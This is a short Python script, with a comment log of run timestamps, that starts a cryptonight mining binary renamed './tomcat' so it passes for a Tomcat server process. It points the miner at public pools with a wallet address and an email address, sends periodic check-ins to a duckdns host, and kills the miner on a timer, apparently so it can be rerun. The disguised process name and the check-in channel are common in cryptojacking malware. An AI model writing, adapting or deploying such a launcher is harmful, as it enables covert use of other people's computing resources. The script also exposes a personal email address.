import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:02.149172
#2018-02-17 16:48:07.377556
#2018-02-17 18:36:04.300673
#2018-02-17 20:23:05.986743
#2018-02-17 22:10:05.931264
#2018-02-17 23:53:04.520895
#2018-02-18 01:42:03.564441
#2018-02-18 03:29:04.536800
#2018-02-18 05:17:01.326238
#2018-02-18 07:09:01.701552
#2018-02-18 08:57:01.368743
#2018-02-18 10:43:07.622043
#2018-02-18 12:27:07.556050
#2018-02-18 14:15:09.501807
#2018-02-18 16:07:01.936172
#2018-02-18 17:55:09.250587
#2018-02-18 19:42:06.736240
#2018-02-18 21:27:03.243469
#2018-02-18 23:15:08.812893
#2018-02-19 01:03:01.848068
#2018-02-19 02:50:03.725617
#2018-02-19 04:37:03.848216
#2018-02-19 06:21:01.464153
#2018-02-19 08:09:07.611459
#2018-02-19 09:59:06.045896
#2018-02-19 11:48:09.886583
#2018-02-19 13:36:04.622227
#2018-02-19 15:25:09.975890
#2018-02-19 17:14:10.120368
#2018-02-19 19:02:07.459586
#2018-02-19 20:50:04.027405
#2018-02-19 22:37:06.550151
#2018-02-20 00:21:05.710931
#2018-02-20 02:08:03.919144
#2018-02-20 03:57:07.315276
#2018-02-20 05:43:05.360420
#2018-02-20 07:30:04.913393
#2018-02-20 09:15:10.157659
#2018-02-20 10:58:09.356591
#2018-02-20 12:47:07.935259
#2018-02-20 14:31:08.987901
#2018-02-20 16:17:01.628189
#2018-02-20 18:03:13.112025
#2018-02-20 19:53:08.514956
#2018-02-20 21:42:02.233001
#2018-02-20 23:24:06.012243
#2018-02-21 01:09:04.341104
#2018-02-21 02:56:07.385564
#2018-02-21 04:43:01.426985
#2018-02-21 06:30:07.830081
#2018-02-21 08:15:09.032265
#2018-02-21 10:01:09.466862
#2018-02-21 11:49:03.729051
#2018-02-21 13:39:07.938059
#2018-02-21 15:24:04.216108
#2018-02-21 17:14:08.312543
#2018-02-21 19:03:06.456299
#2018-02-21 20:51:06.767391
#2018-02-21 22:36:08.556145
#2018-02-22 00:25:09.460033
#2018-02-22 02:14:01.796249
#2018-02-22 04:01:02.067589
#2018-02-22 05:47:03.509875
#2018-02-22 07:34:01.687504
#2018-02-22 09:22:06.193344
#2018-02-22 11:08:06.035986
#2018-02-22 12:54:08.066610
#2018-02-22 14:42:05.935573
#2018-02-22 16:28:10.135672
#2018-02-22 18:15:02.983872
#2018-02-22 20:04:06.780702
#2018-02-22 21:53:04.491320
#2018-02-22 23:41:07.185063
#2018-02-23 01:28:05.725014
#2018-02-23 03:14:05.159391
#2018-02-23 05:01:04.050442
#2018-02-23 06:47:04.545229
#2018-02-23 08:34:05.913877
#2018-02-23 10:47:08.133450
#2018-02-23 12:46:06.794424
#2018-02-23 14:31:03.912403
#2018-02-23 16:21:02.215871
#2018-02-23 18:07:05.403049
#2018-02-23 19:52:07.862349
#2018-02-23 21:36:06.614100
#2018-02-23 23:24:05.565900
#2018-02-24 01:18:01.878876
#2018-02-24 03:09:04.339683
#2018-02-24 04:55:04.080470
#2018-02-24 06:40:04.072278
#2018-02-24 08:29:02.088067
#2018-02-24 10:16:05.946688
#2018-02-24 12:11:06.856755
#2018-02-24 13:57:01.882297
#2018-02-24 15:48:01.538055
#2018-02-24 17:42:01.565043
#2018-02-24 19:27:08.196880
#2018-02-24 21:17:05.933682
#2018-02-24 23:55:04.422471
#2018-02-25 04:21:07.963452
#2018-02-25 07:53:03.771793